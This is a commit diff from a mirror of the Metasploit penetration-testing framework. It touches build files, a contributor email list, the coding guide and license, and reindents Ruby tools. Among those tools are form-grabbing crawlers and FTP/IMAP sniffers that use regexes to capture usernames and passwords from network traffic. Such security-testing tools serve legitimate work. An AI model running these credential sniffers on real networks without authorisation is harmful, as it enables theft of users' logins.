infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge remote-tracking branch 'upstream/master' into getaddrinfo

bug/bundler_fix
Meatballs 2013-11-24 15:00:00 +00:00
parent f9359c9d88 13ad48fd78
commit 23ac7ad75a
No known key found for this signature in database
GPG Key ID: 5380EAF01F2F8B38
2987 changed files with 57816 additions and 46315 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

10
.gitignore vendored
View File

@ -41,3 +41,13 @@ tags
*~
# Ignore backups of retabbed files
*.notab
# ignore Visual Studio external source garbage
*.suo
*.sdf
*.opensdf
*.user
# ignore release/debug folders for exploits
external/source/exploits/**/Debug
external/source/exploits/**/Release

39
.mailmap
View File

@ -1,50 +1,54 @@
bperry-r7 <bperry-r7@github> Brandon Perry <bperry.volatile@gmail.com>
bperry-r7 <bperry-r7@github> Brandon Perry <bperry@bperry-rapid7.(none)>
bturner-r7 <bturner-r7@github> Brandon Turner <brandon_turner@rapid7.com>
dmaloney-r7 <dmaloney-r7@github> David Maloney <DMaloney@rapid7.com> # aka TheLightCosine
dmaloney-r7 <dmaloney-r7@github> David Maloney <David_Maloney@rapid7.com>
dmaloney-r7 <dmaloney-r7@github> David Maloney <DMaloney@rapid7.com> # aka TheLightCosine
ecarey-r7 <ecarey-r7@github> Erran Carey <e@ipwnstuff.com>
hmoore-r7 <hmoore-r7@github> HD Moore <hd_moore@rapid7.com>
hmoore-r7 <hmoore-r7@github> HD Moore <hdm@digitaloffense.net>
jlee-r7 <jlee-r7@github> James Lee <James_Lee@rapid7.com>
jlee-r7 <jlee-r7@github> James Lee <egypt@metasploit.com> # aka egypt
jlee-r7 <jlee-r7@github> egypt <egypt@metasploit.com> # aka egypt
jlee-r7 <jlee-r7@github> James Lee <egypt@metasploit.com> # aka egypt
jlee-r7 <jlee-r7@github> James Lee <James_Lee@rapid7.com>
joev-r7 <joev-r7@github> joev <joev@metasploit.com>
joev-r7 <joev-r7@github> Joe Vennix <Joe_Vennix@rapid7.com>
jvazquez-r7 <jvazquez-r7@github> jvazquez-r7 <juan.vazquez@metasploit.com>
jvazquez-r7 <jvazquez-r7@github> jvazquez-r7 <juan_vazquez@rapid7.com>
limhoff-r7 <limhoff-r7@github> Luke Imhoff <luke_imhoff@rapid7.com>
shuckins-r7 <shuckins-r7@github> Samuel Huckins <samuel_huckins@rapid7.com>
tasos-r7 <tasos-r7@github> Tasos Laskos <Tasos_Laskos@rapid7.com>
todb-r7 <todb-r7@github> Tod Beardsley <tod_beardsley@rapid7.com>
todb-r7 <todb-r7@github> Tod Beardsley <todb@metasploit.com>
wchen-r7 <wchen-r7@github> Wei Chen <Wei_Chen@rapid7.com>
wchen-r7 <wchen-r7@github> sinn3r <msfsinn3r@gmail.com> # aka sinn3r
wchen-r7 <wchen-r7@github> sinn3r <wei_chen@rapid7.com>
wchen-r7 <wchen-r7@github> Wei Chen <Wei_Chen@rapid7.com>
wvu-r7 <wvu-r7@github> William Vu <William_Vu@rapid7.com>
wvu-r7 <wvu-r7@github> William Vu <wvu@nmt.edu>
# Above this line are current Rapid7 employees Below this paragraph are
# Above this line are current Rapid7 employees. Below this paragraph are
# volunteers, former employees, and potential Rapid7 employees who, at
# one time or another, had some largeish number of commits landed on
# rapid7/metasploit-framework master branch. This should be refreshed
# periodically. If you're on this list and would like to not be, just
# let todb@metasploit.com know.
bannedit <bannedit@github> David Rude <bannedit0@gmail.com>
Brandon Perry <brandonprry@github> Brandon Perry <bperry.volatile@gmail.com>
Brandon Perry <brandonprry@github> Brandon Perry <bperry@bperry-rapid7.(none)>
Brian Wallace <bwall@github> (B)rian (Wall)ace <nightstrike9809@gmail.com>
Brian Wallace <bwall@github> Brian Wallace <bwall@openbwall.com>
ceballosm <ceballosm@github> Mario Ceballos <mc@metasploit.com>
Chao-mu <Chao-Mu@github> Chao Mu <chao.mu@minorcrash.com>
Chao-mu <Chao-Mu@github> chao-mu <chao.mu@minorcrash.com>
Chao-mu <Chao-Mu@github> chao-mu <chao@confusion.(none)>
ChrisJohnRiley <ChrisJohnRiley@github> Chris John Riley <chris.riley@c22.cc>
ChrisJohnRiley <ChrisJohnRiley@github> Chris John Riley <reg@c22.cc>
FireFart <FireFart@github> Christian Mehlmauer <firefart@gmail.com>
Meatballs1 <Meatballs1@github> Ben Campbell <eat_meatballs@hotmail.co.uk>
Meatballs1 <Meatballs1@github> Meatballs <eat_meatballs@hotmail.co.uk>
Meatballs1 <Meatballs1@github> Meatballs1 <eat_meatballs@hotmail.co.uk>
bannedit <bannedit@github> David Rude <bannedit0@gmail.com>
ceballosm <ceballosm@github> Mario Ceballos <mc@metasploit.com>
corelanc0d3er <corelanc0d3er@github> Peter Van Eeckhoutte (corelanc0d3r) <peter.ve@corelan.be>
corelanc0d3er <corelanc0d3er@github> corelanc0d3r <peter.ve@corelan.be>
corelanc0d3er <corelanc0d3er@github> Peter Van Eeckhoutte (corelanc0d3r) <peter.ve@corelan.be>
darkoperator <darkoperator@github> Carlos Perez <carlos_perez@darkoperator.com>
efraintorres <efraintorres@github> efraintorres <etlownoise@gmail.com>
efraintorres <efraintorres@github> et <>
fab <fab@???> fab <> # fab at revhosts.net (Fabrice MOURRON)
h0ng10 <h0ng10@github> Hans-Martin Münch <hansmartin.muench@googlemail.com>
FireFart <FireFart@github> Christian Mehlmauer <firefart@gmail.com>
h0ng10 <h0ng10@github> h0ng10 <hansmartin.muench@googlemail.com>
h0ng10 <h0ng10@github> Hans-Martin Münch <hansmartin.muench@googlemail.com>
jcran <jcran@github> Jonathan Cran <jcran@0x0e.org>
jcran <jcran@github> Jonathan Cran <jcran@rapid7.com>
jduck <jduck@github> Joshua Drake <github.jdrake@qoop.org>
@ -56,11 +60,16 @@ kris <kris@???> kris <>
m-1-k-3 <m-1-k-3@github> m-1-k-3 <github@s3cur1ty.de>
m-1-k-3 <m-1-k-3@github> m-1-k-3 <m1k3@s3cur1ty.de>
m-1-k-3 <m-1-k-3@github> m-1-k-3 <michael.messner@integralis.com>
Meatballs1 <Meatballs1@github> Ben Campbell <eat_meatballs@hotmail.co.uk>
Meatballs1 <Meatballs1@github> Meatballs <eat_meatballs@hotmail.co.uk>
Meatballs1 <Meatballs1@github> Meatballs1 <eat_meatballs@hotmail.co.uk>
mubix <mubix@github> Rob Fuller <jd.mubix@gmail.com>
nevdull77 <nevdull77@github> Patrik Karlsson <patrik@cqure.net>
nmonkee <nmonkee@github> nmonkee <dave@northern-monkee.co.uk>
nullbind <nullbind@github> nullbind <scott.sutherland@nullbind.com>
ohdae <ohdae@github> ohdae <bindshell@live.com>
OJ <oj@github> OJ Reeves <oj@buffered.io>
OJ <oj@github> OJ <oj@buffered.io>
r3dy <r3dy@github> Royce Davis <r3dy@Royces-MacBook-Pro.local>
r3dy <r3dy@github> Royce Davis <royce.e.davis@gmail.com>
rsmudge <rsmudge@github> Raphael Mudge <rsmudge@gmail.com> # Aka `butane

2
.rspec
View File

@ -1,2 +1,2 @@
--color
--format documentation
--format Fivemat

2
Gemfile
View File

@ -40,6 +40,8 @@ group :development, :test do
# Version 4.1.0 or newer is needed to support generate calls without the
# 'FactoryGirl.' in factory definitions syntax.
gem 'factory_girl', '>= 4.1.0'
# Make rspec output shorter and more useful
gem 'fivemat', '1.2.1'
# running documentation generation tasks and rspec tasks
gem 'rake', '>= 10.0.0'
end

2
Gemfile.lock
View File

@ -18,6 +18,7 @@ GEM
diff-lcs (1.2.4)
factory_girl (4.2.0)
activesupport (>= 3.0.0)
fivemat (1.2.1)
i18n (0.6.5)
json (1.8.0)
metasploit_data_models (0.16.6)
@ -62,6 +63,7 @@ DEPENDENCIES
activesupport (>= 3.0.0)
database_cleaner
factory_girl (>= 4.1.0)
fivemat (= 1.2.1)
json
metasploit_data_models (~> 0.16.6)
msgpack

49
HACKING
View File

@ -36,13 +36,7 @@ lock up the entire module when called from other interfaces. If you
need user input, you can either register an option or expose an
interactive session type specific for the type of exploit.
3. Don't use "sleep". It has been known to cause issues with
multi-threaded programs on various platforms running an older version of
Ruby such as 1.8. Instead, we use "select(nil, nil, nil, <time>)" or
Rex.sleep() throughout the framework. We have found this works around
the underlying issue.
4. Always use Rex sockets, not ruby sockets. This includes
3. Always use Rex sockets, not ruby sockets. This includes
third-party libraries such as Net::Http. There are several very good
reasons for this rule. First, the framework doesn't get notified on
the creation of ruby sockets and won't know how to clean them up in
@ -54,49 +48,46 @@ already implemented with Rex and if the protocol you need is missing,
porting another library to use them is straight-forward. See our
Net::SSH modifications in lib/net/ssh/ for an example.
5. When opening an IO stream, always force binary with "b" mode (or
4. When opening an IO stream, always force binary with "b" mode (or
using IO#binmode). This not only helps keep Windows and non-Windows
runtime environments consistent with each other, but also guarantees
that files will be treated as ASCII-8BIT instead of UTF-8.
6. Don't use String#[] for a single character. This returns a Fixnum in
5. Don't use String#[] for a single character. This returns a Fixnum in
ruby 1.8 and a String in 1.9, so it's safer to use the following idiom:
str[idx,1]
str[idx,1]
which always returns a String. If you need the ASCII byte, unpack it like
so:
str[idx,1].unpack("C")[0]
tr[idx,1].unpack("C")[0]
7. Whenever possible, avoid using '+' or '+=' to concatenate strings.
6. Whenever possible, avoid using '+' or '+=' to concatenate strings.
The '<<' operator is significantly faster. The difference will become
even more apparent when doing string manipulation in a loop. The
following table approximates the underlying implementation:
Ruby Pseudo-C
----------- ----------------
a = b + c a = malloc(b.len+c.len+1);
strcpy(a, b);
memcpy(a+b.len, c, c.len);
a[b.len + c.len] = '\0';
a = b a = b;
a << c a = realloc(a, a.len+c.len+1);
memcpy(a+a.len, c, c.len);
a[a.len + c.len] = '\0';
Ruby Pseudo-C
----------- ----------------
a = b + c a = malloc(b.len+c.len+1);
strcpy(a, b);
memcpy(a+b.len, c, c.len);
a[b.len + c.len] = '\0';
a = b a = b;
a << c a = realloc(a, a.len+c.len+1);
memcpy(a+a.len, c, c.len);
a[a.len + c.len] = '\0';
Note that the original value of 'b' is lost in the second case. Care
must be taken to duplicate strings that you do not want to modify.
8. For other Ruby 1.8.x/1.9.x compat issues, please see Sam Ruby's
7. For other Ruby 1.8.x/1.9.x compat issues, please see Sam Ruby's
excellent slide show at <http://slideshow.rubyforge.org/ruby19.html>
for an overview of common and not-so-common Ruby version related gotchas.
9. Never, ever use $global variables. This applies to modules, mixins,
8. Never, ever use $global variables. This applies to modules, mixins,
and libraries. If you need a "global" within a specific class, you can
use @@class_variables, but most modules should use @instance variables
to store information between methods.
10. Do not define CONSTANTS within individual modules. This can lead to
warning messages when the module is reloaded. Try to keep constants
inside libraries and mixins instead.
Creating New Modules
====================

347
LICENSE
View File

@ -12,7 +12,7 @@ License: BSD-3-clause
#
# This license does not apply to third-party components detailed below.
#
# Last updated: 2013-Mar-25
# Last updated: 2013-Nov-04
#
Files: data/john/*
@ -166,230 +166,6 @@ Files: lib/fastlib.rb
Copyright: 2011, Rapid7 Inc.
License: Ruby
Files: lib/gemcache/ruby/1.9.1/arch/*/eventmachine-*/*
Copyright: 2006-2007, Francis Cianfrocca
License: Ruby
Files: lib/gemcache/ruby/1.9.1/arch/*/json-*/*
Copyright: Daniel Luz <dev at mernen dot com>
License: Ruby
Files: lib/gemcache/ruby/1.9.1/arch/*/msgpack-*/*
Copyright: Austin Ziegler
License: Ruby
Files: lib/gemcache/ruby/1.9.1/arch/*/nokogiri-*/*
Copyright: 2008 - 2012 Aaron Patterson, Mike Dalessio, Charles Nutter, Sergio Arbeo, Patrick Mahoney, Yoko Harada
License: MIT
Files: lib/gemcache/ruby/1.9.1/arch/*/pg-*/*
Copyright: 1997-2012 by the authors
License: Ruby
Files: lib/gemcache/ruby/1.9.1/arch/*/thin-*/*
Copyright: Marc-Andre Cournoyer
License: Ruby
Files: lib/gemcache/ruby/1.9.1/arch/*/win32-api-*/*
Copyright: 2003-2011, Daniel J. Berger
License: Artistic
Files: lib/gemcache/ruby/1.9.1/arch/*/win32-service-*/*
Copyright: 2003-2011, Daniel J. Berger
License: Artistic
Files: lib/gemcache/ruby/1.9.1/arch/*/windows-api-*/*
Copyright: 2007-2012, Daniel J. Berger
License: Artistic
Files: lib/gemcache/ruby/1.9.1/arch/*/windows-pr-*/*
Copyright: 2006-2010, Daniel J. Berger
License: Artistic
Files: lib/gemcache/ruby/1.9.1/gems/coderay-*/*
Copyright: 2006-2011, murphy (Kornelius Kalnback) <murphy rubychan de>
License: LGPL-2.1
Files: lib/gemcache/ruby/1.9.1/gems/actionmailer-*/*
Copyright: 2004-2011 David Heinemeier Hansson
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/actionpack-*/*
Copyright: 2004-2011 David Heinemeier Hansson
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/activemodel-*/*
Copyright: 2004-2011 David Heinemeier Hansson
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/activerecord-*/*
Copyright: 2004-2011 David Heinemeier Hansson
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/activeresource-*/*
Copyright: 2006-2011 David Heinemeier Hansson
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/activesupport-*/*
Copyright: 2005-2011 David Heinemeier Hansson
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/acts_as_list-*/*
Copyright: 2007 David Heinemeir Hansson
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/arel-*/*
Copyright: 2007-2010 Nick Kallen, Bryan Helmkamp, Emilio Tagua, Aaron Patterson
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/authlogic-*/*
Copyright: 2011 Ben Johnson of Binary Logic
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/builder-*/*
Copyright: 2003-2012 Jim Weirich (jim.weirich@gmail.com)
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/carrierwave-*/*
Copyright: 2008-2012 Jonas Nicklas
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/chunky_png-*/*
Copyright: 2010 Willem van Bergen
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/coderay-*/*
Copyright: Rob Aldred
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/daemons-*/*
Copyright: 2005-2012 Thomas Uehlinger
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/diff-lcs-*/*
Copyright: 2004-2011 Austin Ziegler
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/erubis-*/*
Copyright: 2006-2011 kuwata-lab.com all rights reserved
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/formtastic-*/*
Copyright: 2008-2010
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/fssm-*/*
Copyright: 2011 Travis Tilley
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/hike-*/*
Copyright: 2011 Sam Stephenson
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/i18n-*/*
Copyright: 2008 The Ruby I18n team
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/ice_cube-*/*
Copyright: 2010-2012 John Crepezzi
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/journey-*/*
Copyright: 2011 Aaron Patternson
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/jquery-rails-*/*
Copyright: 2010 Andre Arko
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/liquid-*/*
Copyright: 2005, 2006 Tobias Luetke
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/mail-*/*
Copyright: 2009, 2010, 2011, 2012 Mikel Lindsaar
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/metasploit_data_modules-*/*
Copyright: 2012 Rapid7, Inc.
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/method_source-*/*
Copyright: 2011 John Mair (banisterfiend)
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/multi_json-*/*
Copyright: 2010 Michael Bleigh, Josh Kalderimis, Erik Michaels-Ober, and Intridea, Inc.
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/polyglot-*/*
Copyright: 2007 Clifford Heath
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/prototype_legacy_helper-*/*
Copyright: No copyright statement provided (unmaintained per https://github.com/rails/prototype_legacy_helper)
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/rack-*/*
Copyright: 2007-2010 Christian Neukirchen <purl.org/net/chneukirchen>
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/rack-cache-*/*
Copyright: 2008 Ryan Tomayko <http://tomayko.com/about>
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/rack-ssl-*/*
Copyright: 2010 Joshua Peek
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/rack-test-*/*
Copyright: 2008-2009 Bryan Helmkamp, Engine Yard Inc.
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/railties-*/*
Copyright: No copyright statement provided
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/rake-*/*
Copyright: 2003, 2004 Jim Weirich
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/robots-*/*
Copyright: 2008 Kyle Maxwell, contributors
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/slop-*/*
Copyright: 2012 Lee Jarvis
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/spork-*/*
Copyright: 2009 Tim Harper
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/sprockets-*/*
Copyright: 2011 Sam Stephenson, Joshua Peek
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/state_machine-*/*
Copyright: 2006-2012 Aaron Pfeifer
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/thor-*/*
Copyright: 2008 Yehuda Katz
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/tilt-*/*
Copyright: 2010 Ryan Tomayko <http://tomayko.com/about>
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/treetop-*/*
Copyright: 2007 Nathan Sobo
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/tzinfo-*/*
Copyright: 2005-2006 Philip Ross
License: MIT
Files: lib/metasm.rb lib/metasm/* data/cpuinfo/*
Copyright: 2006-2010 Yoann GUILLOT
License: LGPL-2.1
@ -454,6 +230,127 @@ Files: modules/payloads/singles/windows/speak_pwned.rb
Copyright: 2009-2010 Berend-Jan "SkyLined" Wever <berendjanwever@gmail.com>
License: BSD-3-clause
#
# Gems
#
Files: activemodel
Copyright: 2004-2011 David Heinemeier Hansson
License: MIT
Files: activerecord
Copyright: 2004-2011 David Heinemeier Hansson
License: MIT
Files: activesupport
Copyright: 2005-2011 David Heinemeier Hansson
License: MIT
Files: arel
Copyright: 2007-2010 Nick Kallen, Bryan Helmkamp, Emilio Tagua, Aaron Patterson
License: MIT
Files: builder
Copyright: 2003-2012 Jim Weirich (jim.weirich@gmail.com)
License: MIT
Files: database_cleaner
Copyright: 2009 Ben Mabey
License: MIT
Files: diff-lcs
Copyright: 2004-2011 Austin Ziegler
License: MIT
Files: factory_girl
Copyright: 2008-2013 Joe Ferris and thoughtbot, inc.
License: MIT
Files: fivemat
Copyright: 2012 Tim Pope
License: MIT
Files: i18n
Copyright: 2008 The Ruby I18n team
License: MIT
Files: json
Copyright: Daniel Luz <dev at mernen dot com>
License: Ruby
Files: metasploit_data_models
Copyright: 2012 Rapid7, Inc.
License: MIT
Files: mini_portile
Copyright: 2011 Luis Lavena
License: MIT
Files: msgpack
Copyright: Austin Ziegler
License: Ruby
Files: multi_json
Copyright: 2010 Michael Bleigh, Josh Kalderimis, Erik Michaels-Ober, and Intridea, Inc.
License: MIT
Files: network_interface
Copyright: 2012, Rapid7, Inc.
License: MIT
Files: nokogiri
Copyright: 2008 - 2012 Aaron Patterson, Mike Dalessio, Charles Nutter, Sergio Arbeo, Patrick Mahoney, Yoko Harada
License: MIT
Files: packetfu
Copyright: 2008-2012 Tod Beardsley
License: BSD-3-clause
Files: pcaprub
Copyright: 2007-2008, Alastair Houghton
License: LGPL-2.1
Files: pg
Copyright: 1997-2012 by the authors
License: Ruby
Files: rake
Copyright: 2003, 2004 Jim Weirich
License: MIT
Files: redcarpet
Copyright: 2009 Natacha Porté
License: MIT
Files: robots
Copyright: 2008 Kyle Maxwell, contributors
License: MIT
Files: rspec
Copyright: 2009 Chad Humphries, David Chelimsky
License: MIT
Files: shoulda-matchers
Copyright: 2006-2013, Tammer Saleh, thoughtbot, inc.
License: MIT
Files: simplecov
Copyright: 2010-2012 Christoph Olszowka
License: MIT
Files: timecop
Copyright: 2012 Travis Jeffery, John Trupiano
License: MIT
Files: tzinfo
Copyright: 2005-2006 Philip Ross
License: MIT
Files: yard
Copyright: 2007-2013 Loren Segal
License: MIT
License: BSD-2-clause
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:

BIN
data/exploits/CVE-2010-0232/kitrap0d.x86.dll Executable file
View File

Binary file not shown.

46
data/exploits/capture/http/forms/extractforms.rb
View File

@ -15,8 +15,8 @@ require 'open-uri'
require 'timeout'
def usage
$stderr.puts "#{$0} [site list] [output-dir]"
exit(0)
$stderr.puts "#{$0} [site list] [output-dir]"
exit(0)
end
input = ARGV.shift() || usage()
@ -25,32 +25,32 @@ res = ""
doc = Hpricot(File.open(input))
doc.search("//form").each do |form|
# Extract the form
res = "<form"
form.attributes.each do |attr|
res << " #{attr[0]}='#{attr[1].gsub("'", "")}'"
end
res << "> "
# Extract the form
res = "<form"
form.attributes.each do |attr|
res << " #{attr[0]}='#{attr[1].gsub("'", "")}'"
end
res << "> "
# Strip out the value
form.search("//input") do |inp|
# Strip out the value
form.search("//input") do |inp|
inp.attributes.keys.each do |ikey|
if (ikey.downcase == "value")
inp[ikey] = ""
next
end
inp.attributes.keys.each do |ikey|
if (ikey.downcase == "value")
inp[ikey] = ""
next
end
if(inp.attributes[ikey] =~ /^http/i)
inp[ikey] = ""
next
end
if(inp.attributes[ikey] =~ /^http/i)
inp[ikey] = ""
next
end
end
end
res << inp.to_html
end
res << "</form>"
res << inp.to_html
end
res << "</form>"
end
$stdout.puts res

96
data/exploits/capture/http/forms/grabforms.rb
View File

@ -15,72 +15,72 @@ require 'open-uri'
require 'timeout'
def usage
$stderr.puts "#{$0} [site list] [output-dir]"
exit(0)
$stderr.puts "#{$0} [site list] [output-dir]"
exit(0)
end
sitelist = ARGV.shift() || usage()
output = ARGV.shift() || usage()
File.readlines(sitelist).each do |site|
site.strip!
next if site.length == 0
next if site =~ /^#/
site.strip!
next if site.length == 0
next if site =~ /^#/
out = File.join(output, site + ".txt")
File.unlink(out) if File.exists?(out)
out = File.join(output, site + ".txt")
File.unlink(out) if File.exists?(out)
fd = File.open(out, "a")
fd = File.open(out, "a")
["", "www."].each do |prefix|
begin
Timeout.timeout(10) do
doc = Hpricot(open("http://#{prefix}#{site}/"))
doc.search("//form").each do |form|
["", "www."].each do |prefix|
begin
Timeout.timeout(10) do
doc = Hpricot(open("http://#{prefix}#{site}/"))
doc.search("//form").each do |form|
# Extract the form
res = "<form"
form.attributes.each do |attr|
res << " #{attr[0]}='#{attr[1].gsub("'", "")}'"
end
res << "> "
# Extract the form
res = "<form"
form.attributes.each do |attr|
res << " #{attr[0]}='#{attr[1].gsub("'", "")}'"
end
res << "> "
# Strip out the value
form.search("//input") do |inp|
# Strip out the value
form.search("//input") do |inp|
inp.attributes.keys.each do |ikey|
if (ikey.downcase == "value")
inp[ikey] = ""
next
end
inp.attributes.keys.each do |ikey|
if (ikey.downcase == "value")
inp[ikey] = ""
next
end
if(inp.attributes[ikey] =~ /^http/i)
inp[ikey] = ""
next
end
if(inp.attributes[ikey] =~ /^http/i)
inp[ikey] = ""
next
end
end
end
res << inp.to_html
end
res << "</form>"
res << inp.to_html
end
res << "</form>"
fd.write(res)
end
end
break
rescue ::Timeout::Error
$stderr.puts "#{prefix}#{site} timed out"
rescue ::Interrupt
raise $!
rescue ::Exception => e
$stderr.puts "#{prefix}#{site} #{e.class} #{e}"
end
end
fd.write(res)
end
end
break
rescue ::Timeout::Error
$stderr.puts "#{prefix}#{site} timed out"
rescue ::Interrupt
raise $!
rescue ::Exception => e
$stderr.puts "#{prefix}#{site} #{e.class} #{e}"
end
end
fd.close
fd.close
File.unlink(out) if (File.size(out) == 0)
File.unlink(out) if (File.size(out) == 0)
end

110
data/exploits/psnuffle/ftp.rb
View File

@ -8,71 +8,71 @@
class SnifferFTP < BaseProtocolParser
def register_sigs
self.sigs = {
:banner => /^(220\s*[^\r\n]+)/i,
:user => /^USER\s+([^\s]+)/i,
:pass => /^PASS\s+([^\s]+)/i,
:login_pass => /^(230\s*[^\n]+)/i,
:login_fail => /^(5\d\d\s*[^\n]+)/i,
:bye => /^221/
}
end
def register_sigs
self.sigs = {
:banner => /^(220\s*[^\r\n]+)/i,
:user => /^USER\s+([^\s]+)/i,
:pass => /^PASS\s+([^\s]+)/i,
:login_pass => /^(230\s*[^\n]+)/i,
:login_fail => /^(5\d\d\s*[^\n]+)/i,
:bye => /^221/
}
end
def parse(pkt)
# We want to return immediatly if we do not have a packet which is handled by us
return unless pkt.is_tcp?
return if (pkt.tcp_sport != 21 and pkt.tcp_dport != 21)
s = find_session((pkt.tcp_sport == 21) ? get_session_src(pkt) : get_session_dst(pkt))
s[:sname] ||= "ftp"
def parse(pkt)
# We want to return immediatly if we do not have a packet which is handled by us
return unless pkt.is_tcp?
return if (pkt.tcp_sport != 21 and pkt.tcp_dport != 21)
s = find_session((pkt.tcp_sport == 21) ? get_session_src(pkt) : get_session_dst(pkt))
s[:sname] ||= "ftp"
self.sigs.each_key do |k|
# There is only one pattern per run to test
matched = nil
matches = nil
self.sigs.each_key do |k|
# There is only one pattern per run to test
matched = nil
matches = nil
if(pkt.payload =~ self.sigs[k])
matched = k
matches = $1
end
if(pkt.payload =~ self.sigs[k])
matched = k
matches = $1
end
case matched
case matched
when :login_fail
if(s[:user] and s[:pass])
report_auth_info(s.merge({:active => false}))
print_status("Failed FTP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]}")
when :login_fail
if(s[:user] and s[:pass])
report_auth_info(s.merge({:active => false}))
print_status("Failed FTP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]}")
s[:pass] = ""
return
end
s[:pass] = ""
return
end
when :login_pass
if(s[:user] and s[:pass])
report_auth_info(s)
print_status("Successful FTP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]}")
# Remove it form the session objects so freeup memory
sessions.delete(s[:session])
return
end
when :login_pass
if(s[:user] and s[:pass])
report_auth_info(s)
print_status("Successful FTP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]}")
# Remove it form the session objects so freeup memory
sessions.delete(s[:session])
return
end
when :banner
# Because some ftp server send multiple banner we take only the first one and ignore the rest
if not (s[:info])
s[:info] = matches
report_service(s)
end
when :banner
# Because some ftp server send multiple banner we take only the first one and ignore the rest
if not (s[:info])
s[:info] = matches
report_service(s)
end
when :bye
sessions.delete(s[:session])
when :bye
sessions.delete(s[:session])
when nil
# No matches, no saved state
else
sessions[s[:session]].merge!({k => matches})
end # end case matched
when nil
# No matches, no saved state
else
sessions[s[:session]].merge!({k => matches})
end # end case matched
end # end of each_key
end # end of parse
end # end of each_key
end # end of parse
end

104
data/exploits/psnuffle/imap.rb
View File

@ -9,72 +9,72 @@
class SnifferIMAP < BaseProtocolParser
def register_sigs
self.sigs = {
:banner => /^(\*\s+OK[^\n\r]*)/i,
:login => /^CAPABILITY\s+LOGIN\s+([^\s]+)\s+([^\n\r]+)/i,
:login_pass => /^CAPABILITY\s+OK\s+(Login[^\n\r]*)/i,
:login_bad => /^CAPABILITY\s+BAD\s+(Login[^\n\r]*)/i,
:login_fail => /^CAPABILITY\s+NO\s+(Login[^\n\r]*)/i
}
end
def register_sigs
self.sigs = {
:banner => /^(\*\s+OK[^\n\r]*)/i,
:login => /^CAPABILITY\s+LOGIN\s+([^\s]+)\s+([^\n\r]+)/i,
:login_pass => /^CAPABILITY\s+OK\s+(Login[^\n\r]*)/i,
:login_bad => /^CAPABILITY\s+BAD\s+(Login[^\n\r]*)/i,
:login_fail => /^CAPABILITY\s+NO\s+(Login[^\n\r]*)/i
}
end
def parse(pkt)
def parse(pkt)
# We want to return immediatly if we do not have a packet which is handled by us
return unless pkt.is_tcp?
return if (pkt.tcp_sport != 143 and pkt.tcp_dport != 143)
s = find_session((pkt.tcp_sport == 143) ? get_session_src(pkt) : get_session_dst(pkt))
s[:sname] ||= "imap4"
# We want to return immediatly if we do not have a packet which is handled by us
return unless pkt.is_tcp?
return if (pkt.tcp_sport != 143 and pkt.tcp_dport != 143)
s = find_session((pkt.tcp_sport == 143) ? get_session_src(pkt) : get_session_dst(pkt))
s[:sname] ||= "imap4"
self.sigs.each_key do |k|
# There is only one pattern per run to test
matched = nil
matches = nil
self.sigs.each_key do |k|
# There is only one pattern per run to test
matched = nil
matches = nil
if (pkt.payload =~ self.sigs[k])
matched = k
matches = [$1,$2]
end
if (pkt.payload =~ self.sigs[k])
matched = k
matches = [$1,$2]
end
case matched
when :banner
s[:info] = matches
report_service(s)
case matched
when :banner
s[:info] = matches
report_service(s)
when :login_pass
when :login_pass
report_auth_info(s)
print_status("Successful IMAP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
report_auth_info(s)
print_status("Successful IMAP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
# Remove it form the session objects so freeup
sessions.delete(s[:session])
# Remove it form the session objects so freeup
sessions.delete(s[:session])
when :login_fail
when :login_fail
report_auth_info(s.merge({:active => false}))
print_status("Failed IMAP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
report_auth_info(s.merge({:active => false}))
